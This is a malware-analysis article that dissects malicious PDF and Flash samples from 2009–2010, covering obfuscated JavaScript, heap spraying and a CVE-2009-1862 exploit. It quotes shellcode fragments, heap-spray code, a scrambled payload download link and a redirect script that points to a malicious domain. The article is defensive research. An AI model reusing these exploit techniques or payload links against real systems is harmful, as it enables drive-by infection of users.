Exploit.SWF.Agent.br Pdfka.asd Pidief.cvl TDSS TDSS removal binary planting bios infection blind sqli bootkit bootkit remover browser exploitation com hijacking disassembling dll hijacking drive-by downloads hack online banks heap-spray hijack botnet ibank kernel protection kernel-mode rootkit keylogger malware analysis rootkit detection trojan virus removal

Browser attack. Analysis of the malicious Flash objects and PDF documents.

Alisa Esage
@alisaesage

Introduction

Currently most of user infections with malicious code happen using the Web technologies. During the last year the number of such attacks increased more than threefold [1]. The reason is a lot of opportunities for an attack, provided with a large number of potential “victims” in the Web and diversity of applications and libraries, used for the display of various types of Web content: from classic HTML and JavaScript to dynamic and office Flash, PDF, PPT (PowerPoint).

The article is also available in Russian

Nowadays malicious Adobe Flash movies and PDF documents are the most dangerous among all technologies of web-infection. More specifically, malicious PDF documents composed 80% of all discovered exploits to the end of 2009[2]. As it will be shown below, efficiency of Trojan PDF documents is provided with vulnerabilities both in Adobe Acrobat/Reader and Adobe Flash.

We discuss the vulnerabilities in Adobe software just yet, because it prevails in the statistical reports of security companies. In fact the problem is more extensive: first of all it is the problem of vulnerabilities in popular data formats, secondly it is the problem of transparent integration of Web pages with different content types.

Let’s state the reasons, why the vector of mass infection via exploitation of vulnerabilities in the handlers of various data formats is the most dangerous currently and has the highest growth capacity.

1. Extensive attack vector.

Vulnerabilities in the technologies for the processing of popular data formats, integrated with web technologies, mostly are cross-platform, cross-browser and cross-format.

Cross-platform ability naturally follows the urge of monopolist vendors (like Adobe regarding PDF format) to get the maximum market shares. Application is compiled for different operation systems, but is based on the same source code with the same errors. Vulnerability CVE-2009-1862 can be taken as an example – malicious document with this vulnerability will be analyzed in the Example 3: 4 operation systems are the subjects to this vulnerability.

Cross-browser ability of vulnerability in data formats is provided with the fact that the processing of file format, which is external for a browser, is handled in independent application. File is either sent to external handler via plug-in and is displayed in browser window or opens in corresponding application via OS calls. Therefore, if file exploits the vulnerability of handler itself, then it will have an effect regardless vendor, version and actual updates of a browser.

Cross-format is provided with mutual technology integration: Flash movie can be embedded into PDF document, JavaScript code can exist inside PDF and Flash, and all three of them – Flash, PDF and JavaScript can be called from web-page code. Therefore single vulnerability can be exploited with the files of different types.

2. Integration of classic Web technologies with media content and office files grows as the Web is becoming more and more full-scale working environment. For the same reason browser developers try to make the usage of different files more transparent (e.g. display PDF in browser window instead of saving to the hard drive). It assists to the automation of mass infections.

3. Large volume of source code and development dynamics of the libraries for data formats processing contributes to a search and discovery of new vulnerabilities. For example, historical search in any database of vulnerabilities shows that the issue of Adobe Flash vulnerabilities is exhaustless.

4. Success of attacks via malicious office documents (like PDF and PPT) is still provided with social factor: it is psychologically easier for user to open unknown office document, than to launch Flash movie or executable file – it is pretty well-known that such files should be handled with caution.

5. Most of browsers are configured to launch Flash movies and open PDF documents automatically. Therefore vulnerability exploitation and execution of malicious code happen immediately after following the malicious link and downloading the content without user’s participation.

The goal of this article is to provide the system information about working mechanisms of such attacks and logical and instrumental basis for its analysis.

Analysis of malicious files

Example 1. PDF + JavaScript

Let’s analyze the malicious PDF document (MD5: c251dcf3190701c46ee6a3f562df32e6), which is the most popular nowadays. This file was firstly discovered in December 2009 and almost immediately got into Top-20 of malicious soft in the Web [3] (Pdfka.asd – 12th rank) and climbed 2 positions up in January[4] (Pidief.cvl – 10th rank), still remaining the only PDF exploit within the considerable statistical limits (Note: you can find the copies of malicious files for this and further examples and the resulted files of analysis and processing in attached archive).

File size is about 10KB. If you open it in text editor, you will see the typical PDF signature in the header of the file: %PDF.

PDF structure

Structure of PDF file is simple and can be read with a naked eye. Initial data for the analysis of simple PDF exploits can be taken from the article by D. Stevens “Anatomy of Malicious PDF Documents” (in English)[5]. PDF format is fully described in ISO 32000-1 standard and in corresponding reference manual. These documents can be downloaded from Adobe website[6].

Let’s analyze the structure of this malicious file.

You can use pdf-parser utility to get a dump of PDF structure, optimized for analysis. Currently there is no need to use it, since PDF file is pretty small and all its structure is clearly visible. We can see a set of standard objects: catalog (1), content (2), list of pages (3), descriptor of single page (4), comments catalog (5), embedded JavaScript (6) and two stream-type objects (7 and 8). Mostly these data are packed with deflate algorithm (/FlateDecode).

During the analysis of potentially malicious PDF files you should firstly pay attention to active content. In this case embedded JavaScript script (6) is notable. Its data are stored in packed object (7). Packed script occupies 160 bytes only and is almost obscure while checking the PDF file structure.

From PDF to a script

Unpack the packed object using pdf-parser utility:

>pdf-parser.py -o 7 -f 0-sample > 3-javascript-obj 

As a result we have very little script, which receives comments data (or annotations data, function getAnnots) and after some processing executes it as a script (function eval).

Why getAnnots? Some of the top Google results for this function name show the CVE-2009-1492 vulnerability, which is connected with the error of comments processing in Adobe Acrobat. But as it can be seen from corresponding exploit[7], this vulnerability has nothing common with our case. Comments field is used just as a storage for massive part of the script to avoid the suspicions from a first glance.

Comments data, received by getAnnots function, are stored packed in stream-object (8), referred by Annot object (5).

Unpack it as above and you will see the long string like z0dz0az0dz0az09:. Following actions should be done to convert this string into readable script:

As you can see from the code, all ‘z’ symbols are changed into ‘%’ in the string, derived from annotation storage. ‘%’ symbol is a byte delimiter in hexadecimal code. Function unescape converts the hexadecimal sequence into binary code (sequence of ASCII symbols in our case). Decoding of unescape can be done with Decode Unescape online script or any software for HEX-ASCII conversion.

String decoding results with pretty big and intentionally complicated (obfuscated) script (see attached file 7-script2).

Obfuscated JavaScript

How can we analyze intentionally complicated scripts? The first thing which makes a script to look horrifying is pseudorandom names of functions and variables (like v_8yD7D8CG__C). You can change these identifiers with something short to make a script more readable.

Then, functional part of a script should be highlighted: function or sequence of functions, doing the main job. In this case we find the core after checking the script by function names and JavaScript command directives (as opposed to variable identifiers, these ones can’t be obfuscated). This core is eval function. It calls following encrypted part of the script.

There is no need to analyze the decrypting procedure – we can make the script to decrypt itself instead of that. Launch the script in corresponding environment (e.g. in a browser with JavaScript support) and change the eval function with document.write function. Thus decrypted script will be printed in browser window instead of execution.

In this case this trick doesn’t work due to debugging protection (see the file 8-script2-fail!.html). First of all, script uses its own code (arguments.callee[8]) in decryption algorithm. Therefore algorithm works incorrectly after changing eval to document.write.

Secondly, app variable is checked. This variable is initialized in JavaScript-environment (of the application (Adobe Acrobat in this case), and is not initialized in browser or any other JavaScript interpreter.

Let’s summarize the script autodecryption algorithm despite these details.

  1. Original scripted code, wrapped in unescape function, should be substituted instead of arguments.callee variable.
  2. Check of app variable should be avoided with any convenient way (e.g. with adding var app = true command into the script).
  3. All calls for eval() functions should be replaced with document.write().
  4. Angle brackets should be filtered from an argument to document.write() function. Otherwise these brackets will be processed by browser’s HTML-interpreter with output part.
function debrack(s) {
s=s.replace(/>/g, ">");
s=s.replace(/</g, "&lt;");
return(s);
}

From the script to a binary code

Execution of modified script (see file 9-script2-ok.html) in the browser results with new portion of the code (see file a-script3). It is obfuscated in the same manner as previous one. It is the last and the central part of the script, since it doesn’t contain the calls of eval function.

Quick check of the script shows its functional core:

1. Multiple call of unescape function with long arguments like: "%u9090%u9090%u9090%u21eb%ub859:..".

You can find shell code in argument strings to unescape function, since mostly those bytes are encoded, which exceed the range of printed symbols [21h.. 7Eh]. Moreover, first string starts with several 90h bytes, which matches the NOP processor command.

2. this.collabStore = Collab.collectEmailInfo({subj: "", msg: D_3_0824mk});

This function is unusual for JavaScript and immediately attracts attention. Internet search by keywords brings to vulnerability CVE-2009-5659[9] (and to the advertisements of commercial exploit packs).

Analysis of shell code and vulnerability itself is beyond the topic of this article. We want just to note that payload binary code (d-shellcode.exe-payload) includes the link to malicious module, which will be loaded and executed as a result of vulnerability exploitation. This link can be seen with a naked eye.

thpt/:a/gfitbhtaewc.mon/etT/ERTS.3ype/2H85b9b9Vd10000f0700R6575c0ff101T2dbf77dd902l140903K431102 

You can continue an investigation using the parts of the link in the search through the malicious links database malc0de.net, logs of public sandboxes etc.

Example 2. SWF

As distinct from PDF documents with easy readable structure, Adobe Flash movies are more complicated for the analysis. Therefore at first we check the simple example of malicious Flash object: Trojan-Downloader.SWF.Small.fj (MD5: f8e4e4206586f566c5dddc74884e57df).

This is 232 bytes file. File starts with CWS signature – it corresponds with Flash format with compression[10]. You can use cws2fws utility to decompress it. Analysis-ready Flash format without compression has FWS signature.

Flash is the binary format. Along with meta information and static media content it uses ActionScript script language to describe the compiled program, which provides all Flash dynamics and interactivity: from visual forms management to opening the web pages. You can use SWFTools utility pack to analyze the file structure.

ActionScript program is the most interesting from the standpoint of potentially malicious content of Flash object. You can use SWFScan utility to decompile ActionScript and swfdump utility from SWFTools pack to get a dump of bytecode mnemonics.

Decompiled ActionScript of this file looks as follows:

As you can see from the script, Flash object sends small script (this.getURL) to browser command string. Decoding of the script results with the string: window.location = "//pizdachesabuserov.xorg.pl/go/'+document.location.search+'";

So, this Flash movie redirects browser to another domain, sending some arguments with the current URL to this domain (part of URL after ? symbol). It is the part of scenario of mass infection of web users using the SEO Poisoning technology[11].

Example 3. PDF + SWF

Now we know the principles of analysis of both PDF and SWF files. Let’s take more complicated case: Exploit.SWF.Agent.br (MD5: 09a0f7aae0e22b5d80c7950890f3f738). It is relatively old exploit, discovered in July 2009, but it has made a lot of noise due to interesting features of the structure of malicious file[12].

It is PDF document of about 1 MB. Quick view at the file structure shows a lot of PDF objects, mixed with large blocks of binary data. Therefore it is reasonable to use pdf-parser utility to analyze the file structure.

PDF structure

Analysis of file structure (pdf-parser.py 0-sample > 1-pdfparse) doesn’t show anything extraordinary. There are no scripts, only several ObjStm and XObject objects with unclear purpose.

Let’s analyze PDF more thoroughly, including the printout of unpacked binary data (pdf-parser.py -f 0-sample > 2-streamfilter) into file structure dump. Our goal is to check if there is something suspicious in packed data.

Quick view over the largest blocks of unpacked data results with several images (/Subtype /Image - objects 29, 31, 5), metadata block (/Type /Metadata – object 6) and two suspicious blocks of embedded PDF layout (objects 33 and 7). More thorough analysis of one of the blocks (33) shows the links to two attached SWF files:

<>/F(fancyBall.swf)/Type/Filespec/UF(fancyBall.swf)>>
<>/F(oneoff.swf)/Type/Filespec/UF(oneoff.swf)>>

Ability to embed Flash objects into the PDF documents appeared in Adobe Reader starting with version 9 and is described in the Supplement to ISO 32000[13].

Second PDF object (7) includes the link to embedded image:

<>/F(love_wallpaper_butterfly-dsc08951.jpg)

We save the corresponding objects (2,3 and 4) for further analysis (pdf-parser.py -o 2 -d 0-sample > 3- fancyball.swf etc.).

Analysis of embedded PDF objects

Decompilation of fancyball.swf program results with innocent script, copied from the examples to Flash Professional 9 ActionScript 3.0 Preview[14] (file 3.1-actionscript-decompile):

 public function Ball()
{
    trace("ball created: " + this.name);
    this.buttonMode = true;
    this.addEventListener(MouseEvent.CLICK, this.clickHandler);
    this.addEventListener(MouseEvent.MOUSE_DOWN, this.mouseDownListener);
    this.addEventListener(MouseEvent.MOUSE_UP, this.mouseUpListener);
    return;
}

But the bytecode dump of the same script (swfdump -D 3.0-fancyball.swf > 3.2-actionscript-dump) shows that the initialization function of the script is substituted with the little code of unclear purpose:

initmethod * init=()(0 params, 0 optional)
[stack:2 locals:1 scope:1-9 flags:]
{
    00000) + 0:0 pushshort 2049 
    00001) + 1:0 pushshort 12536
    00002) + 2:0 multiply
    00003) + 1:0 pushscope
    00004) + 0:1 getlex <q>[public]::void
    00005) + 1:1 nop
    00006) + 1:1 nop
:
    00033) + 1:1 returnvoid
}

The only purpose of the code above is to multiply two numbers in the stack (result of multiplication is an address within the heap) and to call the undeclared object (see the instructions for ActionScript virtual machine[15]). After an interpretation of these instructions control is given to heap space (CVE-2009-1862).

And what do we have in the heap?

Let’s analyze the decompiled script of the second Flash object - oneoff.swf (file 4.1-actionscript-decompile).

1. Assigning of two local variables.

internal function frame1()
{
    this.b = "";
    this.a = "";

As you can see in the bytecode dump, it is two numbers: 0x0c0c0c0c и 0x13131313.

00002) + 0:1 findproperty <q>[public]::b
00003) + 1:1 pushstring "\0c\0c\0c\0c"
00004) + 2:1 initproperty <q>[public]::b
00005) + 0:1 findproperty <q>[public]::a
00006) + 1:1 pushstring "\13\13\13\13"
00007) + 2:1 initproperty <q>[public]::a

2. Create 1 MB sequence of 0x13 byte (1048576=1024^2).

while(this.b.length < -1048576)
{
    this.b = this.b + this.a;
}

3. Dynamic creation of an array in the heap.

this.byteArr = new ByteArray();

4. Population of this array with generated sequence 64 times.

this.byteArr = new ByteArray();
while(this.byteArr.length < -1048576 * 64)
{
     byteArr.writeMultiByte(this.b, "iso-8859-1");
}

5. Dynamic generation of shell code in the end of this array.

... 
byteArr.writeByte(144);
byteArr.writeByte(144);
byteArr.writeByte(129);
byteArr.writeByte(236);
byteArr.writeByte(32);
byteArr.writeByte(1);
...

Therefore, execution of the program of this Flash object fills the dynamic memory of a process with an array of 64 MB of neutral instructions (bytecode 0х13 corresponds with adc edx,[ebx] instruction) with shell code in the very end. It is a heap spray technique, providing the reliable execution of a shell code without its assigning to specific address in a memory of process, which captures control after vulnerability exploitation.

Shell code (we will not analyze its details here) decrypts and launches the malicious modules, included into the image file love_wallpaper_butterfly-dsc08951.jpg. These modules can be decrypted and highlighted manually - just pay an attention to the long sequences of 1 byte (0xA0, 0x37) in file code and suppose that they match with the result of stream XOR encryption of zero sequence, indicative for the header of executable module (see files 7-malware1.ex, 9.0-malware2).

Along with executable modules, there is one more embedded PDF file in this “image” (8.0-emdedded.pdf).

Conclusion

We would like to highlight several important points in our conclusion of example analysis.

1. Both vulnerabilities, exploited by analyzed malicious files, are cross-platform.

2. Vulnerability from the last example (CVE-2009-1862) is also cross-format: Adobe Flash objects can be executed as separate modules, can be embedded into web page or PDF document.

3. Therefore, exploit from the last example has a great potential for attack: there are several attack vectors (Flash at web pages, PDF documents) in four operation systems (Windows, Macintosh, Linux and Solaris[16]). The same is true to a greater or lesser extent for any Flash vulnerability.

4. Two months have passed from the approximate date of vulnerability discovery (1st of June 2009 – date of vulnerability inclusion into CVE database) until the publication of patch by Adobe company (30th of July 2009 – date of corresponding bulletin[17]).

Addendum to article: nb2-flash-attachment.rar (password is sent by request).

Links

1. Kaspersky Lab Kaspersky Security Bulletin 2009. Основная статистика за 2009 год.
2. ScanSafe. Annual Global Threat Report 2009.
3. Kaspersky Lab Malicious software rating, декабрь 2009.
4. Kaspersky Lab Malicious software rating, январь 2010.
5. D. Stevens. Anatomy of Malicious PDF Documents
6. Adobe. Portable Document Format - Part 1: PDF 1.7, First Edition
7. Milw0rm. Эксплойт для CVE 2009-1492
8. Bojan Zdrnja. Browser *does* matter, not only for vulnerabilities - a story on JavaScript deobfuscation.
9. SecurityFocus. Exploit for CVE-5659
10. Adobe. SWF File Format Specification Version 10
11. Tiger Woods SEO poisoning attack
12. Kaspersky Lab SWF или PDF? Все одно - Adobe!
13. Adobe. Acrobat Supplement to the ISO 32000
14. Jen deHaan. Exploring the Flash Professional 9 ActionScript 3.0 Preview
15. Adobe. ActionScript Virtual Machine 2 Overview
16. Adobe. Security advisory for Adobe Reader, Acrobat and Flash Player
17. Adobe. Security updates available for Adobe Flash Player, Adobe Reader and Acrobat


Last updated: 17.03.2012